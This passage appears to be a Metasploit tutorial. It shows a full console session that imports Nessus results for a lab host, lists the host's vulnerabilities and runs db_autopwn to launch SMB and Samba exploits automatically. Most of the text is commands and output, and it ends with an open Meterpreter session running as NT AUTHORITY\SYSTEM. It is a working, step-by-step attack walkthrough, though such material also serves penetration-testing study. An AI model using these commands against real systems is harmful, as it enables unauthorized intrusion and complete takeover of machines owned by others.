[email protected]:# msfconsolemsf > db_create
[*] Creating a new database instance…
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > load db_tracker
[*] Successfully loaded plugin: db_tracker
msf >
After creating the database you can do many things but it is recommended to check the help command.
msf > help
…snip…
Database Backend Commands
=========================
Command Description
——- ———–
db_add_host Add one or more hosts to the database
db_add_note Add a note to host
db_add_port Add a port to host
db_autopwn Automatically exploit everything
db_connect Connect to an existing database
msf > db_import_nessus_nbe /root/ehacking.nbe
msf > hosts
[*] Time: Tue Jun 14 17:40:23 -0600 2011 Host: 192.168.1.115 Status: alive OS:
msf > vulns
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=22 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.50282 refs=NSS-1.3.6.1.4.1.25623.1.0.50282
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=445 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.11011 refs=NSS-1.3.6.1.4.1.25623.1.0.11011
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=139 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.11011 refs=NSS-1.3.6.1.4.1.25623.1.0.11011
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=137 proto=udp name=NSS-1.3.6.1.4.1.25623.1.0.10150 refs=NSS-1.3.6.1.4.1.25623.1.0.10150,CVE-1999-0621
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=445 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.10394 refs=NSS-1.3.6.1.4.1.25623.1.0.10394
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=123 proto=udp name=NSS-1.3.6.1.4.1.25623.1.0.10884 refs=NSS-1.3.6.1.4.1.25623.1.0.10884
msf > db_autopwn -h
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port
-q Disable exploit module output
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
msf > db_autopwn -x -e
[*] (8/38): Launching exploit/multi/samba/nttrans against 192.168.1.115:139…
[*] (9/38): Launching exploit/windows/smb/psexec against 192.168.1.115:445…
[*] (10/38): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.115:445…
[-] Exploit failed: The connection was refused by the remote host (192.168.1.115:22).
[*] (35/38): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.115:445…
[*] Started bind handler
[-] Exploit failed: No encoders encoded the buffer successfully.
msf >
[*] Binding to 3d742890-397c-11cf-9bf1-00805f88cb72:[email protected]_np:192.168.1.115[alert] …
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:[email protected]_np:192.168.1.115[lsarpc]…
[-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[*] Transmitting intermediate stager for over-sized stage…(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:40814 -> 192.168.1.115:14198)
msf > sessions -l
Active sessions
===============
Id Description Tunnel
— ———– ——
1 Meterpreter 192.168.1.101:40814 -> 192.168.1.115:14198
msf > sessions -i 1
[*] Starting interaction with 1…
meterpreter > sysinfo
Computer: DOOKIE-FA154354
OS : Windows XP (Build 2600, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM